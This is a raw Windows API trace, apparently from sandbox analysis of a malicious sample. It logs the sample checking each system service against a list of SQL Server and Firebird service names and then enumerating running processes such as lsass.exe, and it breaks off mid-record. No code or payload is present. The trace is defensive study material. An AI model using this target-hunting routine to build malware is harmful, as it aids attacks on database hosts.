lstrcmpiW (lpString1="sqlwriter", lpString2="LanmanServer") returned 1 [0314.989] lstrcmpiW (lpString1="mssqlserver", lpString2="LanmanServer") returned 1 [0314.989] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="LanmanServer") returned 1 [0314.989] lstrlenW (lpString="LanmanWorkstation") returned 17 [0314.989] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="LanmanWorkstation") returned -1 [0314.989] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="LanmanWorkstation") returned -1 [0314.989] lstrcmpiW (lpString1="sqlwriter", lpString2="LanmanWorkstation") returned 1 [0314.989] lstrcmpiW (lpString1="mssqlserver", lpString2="LanmanWorkstation") returned 1 [0314.989] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="LanmanWorkstation") returned 1 [0314.989] lstrlenW (lpString="lfsvc") returned 5 [0314.989] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="lfsvc") returned -1 [0314.989] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="lfsvc") returned -1 [0314.989] lstrcmpiW (lpString1="sqlwriter", lpString2="lfsvc") returned 1 [0314.989] lstrcmpiW (lpString1="mssqlserver", lpString2="lfsvc") returned 1 [0314.989] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="lfsvc") returned 1 [0314.989] lstrlenW (lpString="lmhosts") returned 7 [0314.989] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="lmhosts") returned -1 [0314.989] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="lmhosts") returned -1 [0314.989] lstrcmpiW (lpString1="sqlwriter", lpString2="lmhosts") returned 1 [0314.990] lstrcmpiW (lpString1="mssqlserver", lpString2="lmhosts") returned 1 [0314.990] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="lmhosts") returned 1 [0314.990] lstrlenW (lpString="LSM") returned 3 [0314.990] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="LSM") returned -1 [0314.990] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="LSM") returned -1 [0314.990] lstrcmpiW (lpString1="sqlwriter", lpString2="LSM") returned 1 [0314.990] lstrcmpiW (lpString1="mssqlserver", lpString2="LSM") returned 1 [0314.990] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="LSM") returned 1 [0314.990] lstrlenW (lpString="MpsSvc") returned 6 [0314.990] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="MpsSvc") returned -1 [0314.990] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="MpsSvc") returned -1 [0314.990] lstrcmpiW (lpString1="sqlwriter", lpString2="MpsSvc") returned 1 [0314.990] lstrcmpiW (lpString1="mssqlserver", lpString2="MpsSvc") returned 1 [0314.990] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="MpsSvc") returned 1 [0314.990] lstrlenW (lpString="NcbService") returned 10 [0314.990] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="NcbService") returned -1 [0314.990] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="NcbService") returned -1 [0314.990] lstrcmpiW (lpString1="sqlwriter", lpString2="NcbService") returned 1 [0314.990] lstrcmpiW (lpString1="mssqlserver", lpString2="NcbService") returned -1 [0314.991] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="NcbService") returned 1 [0314.991] lstrlenW (lpString="netprofm") returned 8 [0314.991] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="netprofm") returned -1 [0314.991] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="netprofm") returned -1 [0314.991] lstrcmpiW (lpString1="sqlwriter", lpString2="netprofm") returned 1 [0314.991] lstrcmpiW (lpString1="mssqlserver", lpString2="netprofm") returned -1 [0314.991] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="netprofm") returned 1 [0314.991] lstrlenW (lpString="NgcSvc") returned 6 [0314.991] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="NgcSvc") returned -1 [0314.991] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="NgcSvc") returned -1 [0314.991] lstrcmpiW (lpString1="sqlwriter", lpString2="NgcSvc") returned 1 [0314.991] lstrcmpiW (lpString1="mssqlserver", lpString2="NgcSvc") returned -1 [0314.991] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="NgcSvc") returned 1 [0314.991] lstrlenW (lpString="NlaSvc") returned 6 [0314.991] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="NlaSvc") returned -1 [0314.991] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="NlaSvc") returned -1 [0314.991] lstrcmpiW (lpString1="sqlwriter", lpString2="NlaSvc") returned 1 [0314.991] lstrcmpiW (lpString1="mssqlserver", lpString2="NlaSvc") returned -1 [0314.992] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="NlaSvc") returned 1 [0314.992] lstrlenW (lpString="nsi") returned 3 [0314.992] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="nsi") returned -1 [0314.992] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="nsi") returned -1 [0314.992] lstrcmpiW (lpString1="sqlwriter", lpString2="nsi") returned 1 [0314.992] lstrcmpiW (lpString1="mssqlserver", lpString2="nsi") returned -1 [0314.992] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="nsi") returned 1 [0314.992] lstrlenW (lpString="PcaSvc") returned 6 [0314.992] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="PcaSvc") returned -1 [0314.992] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="PcaSvc") returned -1 [0314.992] lstrcmpiW (lpString1="sqlwriter", lpString2="PcaSvc") returned 1 [0314.992] lstrcmpiW (lpString1="mssqlserver", lpString2="PcaSvc") returned -1 [0314.992] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="PcaSvc") returned 1 [0314.992] lstrlenW (lpString="PlugPlay") returned 8 [0314.992] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="PlugPlay") returned -1 [0314.992] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="PlugPlay") returned -1 [0314.992] lstrcmpiW (lpString1="sqlwriter", lpString2="PlugPlay") returned 1 [0314.992] lstrcmpiW (lpString1="mssqlserver", lpString2="PlugPlay") returned -1 [0314.993] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="PlugPlay") returned 1 [0314.993] lstrlenW (lpString="Power") returned 5 [0314.993] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Power") returned -1 [0314.993] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Power") returned -1 [0314.993] lstrcmpiW (lpString1="sqlwriter", lpString2="Power") returned 1 [0314.993] lstrcmpiW (lpString1="mssqlserver", lpString2="Power") returned -1 [0314.993] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Power") returned 1 [0314.993] lstrlenW (lpString="ProfSvc") returned 7 [0314.993] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="ProfSvc") returned -1 [0314.993] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="ProfSvc") returned -1 [0314.993] lstrcmpiW (lpString1="sqlwriter", lpString2="ProfSvc") returned 1 [0314.993] lstrcmpiW (lpString1="mssqlserver", lpString2="ProfSvc") returned -1 [0314.993] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="ProfSvc") returned 1 [0314.993] lstrlenW (lpString="RpcEptMapper") returned 12 [0314.993] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="RpcEptMapper") returned -1 [0314.993] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="RpcEptMapper") returned -1 [0314.993] lstrcmpiW (lpString1="sqlwriter", lpString2="RpcEptMapper") returned 1 [0314.993] lstrcmpiW (lpString1="mssqlserver", lpString2="RpcEptMapper") returned -1 [0314.993] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="RpcEptMapper") returned 1 [0314.993] lstrlenW (lpString="RpcSs") returned 5 [0314.994] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="RpcSs") returned -1 [0314.994] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="RpcSs") returned -1 [0314.994] lstrcmpiW (lpString1="sqlwriter", lpString2="RpcSs") returned 1 [0314.994] lstrcmpiW (lpString1="mssqlserver", lpString2="RpcSs") returned -1 [0314.994] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="RpcSs") returned 1 [0314.994] lstrlenW (lpString="SamSs") returned 5 [0314.994] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="SamSs") returned -1 [0314.994] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="SamSs") returned -1 [0314.994] lstrcmpiW (lpString1="sqlwriter", lpString2="SamSs") returned 1 [0314.994] lstrcmpiW (lpString1="mssqlserver", lpString2="SamSs") returned -1 [0314.994] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="SamSs") returned 1 [0314.994] lstrlenW (lpString="Schedule") returned 8 [0314.994] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Schedule") returned -1 [0314.994] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Schedule") returned -1 [0314.994] lstrcmpiW (lpString1="sqlwriter", lpString2="Schedule") returned 1 [0314.995] lstrcmpiW (lpString1="mssqlserver", lpString2="Schedule") returned -1 [0314.995] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Schedule") returned 1 [0314.995] lstrlenW (lpString="SecurityHealthService") returned 21 [0314.995] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="SecurityHealthService") returned -1 [0314.995] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="SecurityHealthService") returned -1 [0314.995] lstrcmpiW (lpString1="sqlwriter", lpString2="SecurityHealthService") returned 1 [0314.995] lstrcmpiW (lpString1="mssqlserver", lpString2="SecurityHealthService") returned -1 [0314.996] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="SecurityHealthService") returned 1 [0314.996] lstrlenW (lpString="SENS") returned 4 [0314.996] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="SENS") returned -1 [0314.996] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="SENS") returned -1 [0314.996] lstrcmpiW (lpString1="sqlwriter", lpString2="SENS") returned 1 [0314.996] lstrcmpiW (lpString1="mssqlserver", lpString2="SENS") returned -1 [0314.996] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="SENS") returned 1 [0314.996] lstrlenW (lpString="ShellHWDetection") returned 16 [0314.996] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="ShellHWDetection") returned -1 [0314.996] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="ShellHWDetection") returned -1 [0314.996] lstrcmpiW (lpString1="sqlwriter", lpString2="ShellHWDetection") returned 1 [0314.996] lstrcmpiW (lpString1="mssqlserver", lpString2="ShellHWDetection") returned -1 [0314.996] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="ShellHWDetection") returned 1 [0314.996] lstrlenW (lpString="Spooler") returned 7 [0314.996] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Spooler") returned -1 [0314.996] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Spooler") returned -1 [0314.996] lstrcmpiW (lpString1="sqlwriter", lpString2="Spooler") returned 1 [0314.996] lstrcmpiW (lpString1="mssqlserver", lpString2="Spooler") returned -1 [0314.996] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Spooler") returned 1 [0314.997] lstrlenW (lpString="StateRepository") returned 15 [0314.997] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="StateRepository") returned -1 [0314.997] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="StateRepository") returned -1 [0314.997] lstrcmpiW (lpString1="sqlwriter", lpString2="StateRepository") returned -1 [0314.997] lstrcmpiW (lpString1="mssqlserver", lpString2="StateRepository") returned -1 [0314.997] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="StateRepository") returned -1 [0314.997] lstrlenW (lpString="SysMain") returned 7 [0314.997] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="SysMain") returned -1 [0314.997] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="SysMain") returned -1 [0314.997] lstrcmpiW (lpString1="sqlwriter", lpString2="SysMain") returned -1 [0314.997] lstrcmpiW (lpString1="mssqlserver", lpString2="SysMain") returned -1 [0314.997] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="SysMain") returned -1 [0314.997] lstrlenW (lpString="SystemEventsBroker") returned 18 [0314.997] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="SystemEventsBroker") returned -1 [0314.997] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="SystemEventsBroker") returned -1 [0314.997] lstrcmpiW (lpString1="sqlwriter", lpString2="SystemEventsBroker") returned -1 [0314.997] lstrcmpiW (lpString1="mssqlserver", lpString2="SystemEventsBroker") returned -1 [0314.997] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="SystemEventsBroker") returned -1 [0314.997] lstrlenW (lpString="Themes") returned 6 [0314.998] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Themes") returned -1 [0314.998] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Themes") returned -1 [0314.998] lstrcmpiW (lpString1="sqlwriter", lpString2="Themes") returned -1 [0314.998] lstrcmpiW (lpString1="mssqlserver", lpString2="Themes") returned -1 [0314.998] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Themes") returned -1 [0314.998] lstrlenW (lpString="tiledatamodelsvc") returned 16 [0314.998] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="tiledatamodelsvc") returned -1 [0314.998] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="tiledatamodelsvc") returned -1 [0314.998] lstrcmpiW (lpString1="sqlwriter", lpString2="tiledatamodelsvc") returned -1 [0314.998] lstrcmpiW (lpString1="mssqlserver", lpString2="tiledatamodelsvc") returned -1 [0314.998] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x41539d8 | out: hHeap=0x470000) returned 1 [0314.998] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x530 [0315.005] Process32FirstW (in: hSnapshot=0x530, lppe=0x248fd2c | out: lppe=0x248fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0315.006] Process32NextW (in: hSnapshot=0x530, lppe=0x248fd2c | out: lppe=0x248fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x72, th32ParentProcessID=0x0, pcPriClassBase=8, dwFlags=0x0, szExeFile="System")) returned 1 [0315.007] lstrlenW (lpString="System") returned 6 [0315.007] Process32NextW (in: hSnapshot=0x530, lppe=0x248fd2c | out: lppe=0x248fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x144, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x4, pcPriClassBase=11, dwFlags=0x0, szExeFile="smss.exe")) returned 1 [0315.008] lstrlenW (lpString="smss.exe") returned 8 [0315.008] Process32NextW (in: hSnapshot=0x530, lppe=0x248fd2c | out: lppe=0x248fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1a4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x19c, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0315.009] lstrlenW (lpString="csrss.exe") returned 9 [0315.009] Process32NextW (in: hSnapshot=0x530, lppe=0x248fd2c | out: lppe=0x248fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1e8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x19c, pcPriClassBase=13, dwFlags=0x0, szExeFile="wininit.exe")) returned 1 [0315.010] lstrlenW (lpString="wininit.exe") returned 11 [0315.010] Process32NextW (in: hSnapshot=0x530, lppe=0x248fd2c | out: lppe=0x248fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1f4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x1e0, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0315.126] lstrlenW (lpString="csrss.exe") returned 9 [0315.126] Process32NextW (in: hSnapshot=0x530, lppe=0x248fd2c | out: lppe=0x248fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x230, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x1e0, pcPriClassBase=13, dwFlags=0x0, szExeFile="winlogon.exe")) returned 1 [0315.127] lstrlenW (lpString="winlogon.exe") returned 12 [0315.127] Process32NextW (in: hSnapshot=0x530, lppe=0x248fd2c | out: lppe=0x248fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x24c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x1e8, pcPriClassBase=9, dwFlags=0x0, szExeFile="services.exe")) returned 1 [0315.128] lstrlenW (lpString="services.exe") returned 12 [0315.128] Process32NextW (in: hSnapshot=0x530, lppe=0x248fd2c | out: lppe=0x248fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x254, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x1e8, pcPriClassBase=9, dwFlags=0x0, szExeFile="lsass.exe")) returned 1 [0315.129] lstrlenW (lpString="lsass.exe") returned 9 [0315.129] Process32NextW (in: hSnapshot=0x530, lppe=0x248fd2c | out: lppe=0x248fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x2ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x230, pcPriClassBase=8, dwFlags=0x0, szExeFile="fontdrvhost.exe")) returned 1 [0315.130] lstrlenW (lpString="fontdrvhost.exe") returned 15 [0315.130] Process32NextW (in: hSnapshot=0x530, lppe=0x248fd2c | out: lppe=0x248fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x2b4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x1e8, pcPriClassBase=8, dwFlags=0x0, szExeFile="fontdrvhost.exe")) returned 1 [0315.131] lstrlenW (lpString="fontdrvhost.exe") returned 15 [0315.131] Process32NextW (in: hSnapshot=0x530, lppe=0x248fd2c | out: lppe=0x248fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x2e8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x12, th32ParentProcessID=0x24c, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0315.131] lstrlenW (lpString="svchost.exe") returned 11 [0315.132] Process32NextW (in: hSnapshot=0x530, lppe=0x248fd2c | out: lppe=0x248fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x310, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xc, th32ParentProcessID=0x24c, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0315.132] lstrlenW (lpString="svchost.exe") returned 11 [0315.132] Process32NextW (in: hSnapshot=0x530, lppe=0x248fd2c | out: lppe=0x248fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x368, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xc, th32ParentProcessID=0x230, pcPriClassBase=13, dwFlags=0x0, szExeFile="dwm.exe")) returned 1 [0315.134] lstrlenW (lpString="dwm.exe") returned 7 [0315.134] Process32NextW (in: hSnapshot=0x530, lppe=0x248fd2c | out: lppe=0x248fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x3d0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1a, th32ParentProcessID=0x24c, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0315.134] lstrlenW (lpString="svchost.exe") returned 11 [0315.135] Process32NextW (in: hSnapshot=0x530, lppe=0x248fd2c | out: lppe=0x248fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x3d8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x13, th32ParentProcessID=0x24c, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0315.135] lstrlenW (lpString="svchost.exe") returned 11 [0315.135] Process32NextW (in: hSnapshot=0x530, lppe=0x248fd2c | out: lppe=0x248fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x3e4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3f, th32ParentProcessID=0x24c, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0315.136] lstrlenW (lpString="svchost.exe") returned 11 [0315.136] Process32NextW (in: hSnapshot=0x530, lppe=0x248fd2c | out: lppe=0x248fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x16c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x12, th32ParentProcessID=0x24c, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0315.137] lstrlenW (lpString="svchost.exe") returned 11 [0315.137] Process32NextW (in: hSnapshot=0x530, lppe=0x248fd2c | out: lppe=0x248fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x3a8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x24, th32ParentProcessID=0x24c, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0315.138] lstrlenW (lpString="svchost.exe") returned 11 [0315.138] Process32NextW (in: hSnapshot=0x530, lppe=0x248fd2c | out: lppe=0x248fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x490, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x17, th32ParentProcessID=0x24c, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0315.138] lstrlenW (lpString="svchost.exe") returned 11 [0315.138] Process32NextW (in: hSnapshot=0x530, lppe=0x248fd2c | out: lppe=0x248fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x52c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x24c, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0315.139] lstrlenW (lpString="svchost.exe") returned 11 [0315.139] Process32NextW (in: hSnapshot=0x530, lppe=0x248fd2c | out: lppe=0x248fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x584, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x24c, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0315.141] lstrlenW (lpString="svchost.exe") returned 11 [0315.141] Process32NextW (in: hSnapshot=0x530, lppe=0x248fd2c | out: lppe=0x248fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x58c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x24c, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0315.142] lstrlenW (lpString="svchost.exe") returned 11 [0315.142] Process32NextW (in: hSnapshot=0x530, lppe=0x248fd2c | out: lppe=0x248fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x5a4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x24c, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0315.143] lstrlenW (lpString="svchost.exe") returned 11 [0315.143] Process32NextW (in: hSnapshot=0x530, lppe=0x248fd2c | out: lppe=0x248fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x5ec, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x24c, pcPriClassBase=8, dwFlags=0x0, szExeFile="spoolsv.exe")) returned 1 [0315.143] lstrlenW (lpString="spoolsv.exe") returned 11 [0315.144] Process32NextW (in: hSnapshot=0x530, lppe=0x248fd2c | out: lppe=0x248fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x668, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x24c, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0315.144] lstrlenW (lpString="svchost.exe") returned 11 [0315.144] Process32NextW (in: hSnapshot=0x530, lppe=0x248fd2c | out: lppe=0x248fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x688, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x52c, pcPriClassBase=8, dwFlags=0x0, szExeFile="audiodg.exe")) returned 1 [0315.145] lstrlenW (lpString="audiodg.exe") returned 11 [0315.145] Process32NextW (in: hSnapshot=0x530, lppe=0x248fd2c | out: lppe=0x248fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x6dc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x13, th32ParentProcessID=0x24c, pcPriClassBase=8, dwFlags=0x0, szExeFile="OfficeClickToRun.exe")) returned 1 [0315.146] lstrlenW (lpString="OfficeClickToRun.exe") returned 20 [0315.146] Process32NextW (in: hSnapshot=0x530, lppe=0x248fd2c | out: lppe=0x248fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x714, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x24c, pcPriClassBase=8, dwFlags=0x0, szExeFile="SecurityHealthService.exe")) returned 1 [0315.146] lstrlenW (lpString="SecurityHealthService.exe") returned 25 [0315.146] Process32NextW (in: hSnapshot=0x530, lppe=0x248fd2c | out: lppe=0x248fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x774, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xe, th32ParentProcessID=0x4, pcPriClassBase=8, dwFlags=0x0, szExeFile="Memory Compression")) returned 1 [0315.147] lstrlenW (lpString="Memory Compression") returned 18 [0315.147] Process32NextW (in: hSnapshot=0x530, lppe=0x248fd2c | out: lppe=0x248fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x8b4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x10, th32ParentProcessID=0x3e4, pcPriClassBase=8, dwFlags=0x0, szExeFile="sihost.exe")) returned 1 [0315.148] lstrlenW (lpString="sihost.exe") returned 10 [0315.148] Process32NextW (in: hSnapshot=0x530, lppe=0x248fd2c | out: lppe=0x248fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x8cc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x24c, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0315.149] lstrlenW (lpString="svchost.exe") returned 11 [0315.149] Process32NextW (in: hSnapshot=0x530, lppe=0x248fd2c | out: lppe=0x248fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x938, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xf, th32ParentProcessID=0x3e4, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhostw.exe")) returned 1 [0315.149] lstrlenW (lpString="taskhostw.exe") returned 13 [0315.149] Process32NextW (in: hSnapshot=0x530, lppe=0x248fd2c | out: lppe=0x248fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xa24, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x38, th32ParentProcessID=0xa10, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0315.150] lstrlenW (lpString="explorer.exe") returned 12 [0315.150] Process32NextW (in: hSnapshot=0x530, lppe=0x248fd2c | out: lppe=0x248fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xb40, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x17, th32ParentProcessID=0x2e8, pcPriClassBase=8, dwFlags=0x0, szExeFile="ShellExperienceHost.exe")) returned 1 [0315.151] lstrlenW (lpString="ShellExperienceHost.exe") returned 23 [0315.151] Process32NextW (in: hSnapshot=0x530, lppe=0x248fd2c | out: lppe=0x248fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xb7c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x20, th32ParentProcessID=0x2e8, pcPriClassBase=8, dwFlags=0x0, szExeFile="SearchUI.exe")) returned 1 [0315.151] lstrlenW (lpString="SearchUI.exe") returned 12 [0315.151] Process32NextW (in: hSnapshot=0x530, lppe=0x248fd2c | out: lppe=0x248fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x744, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, 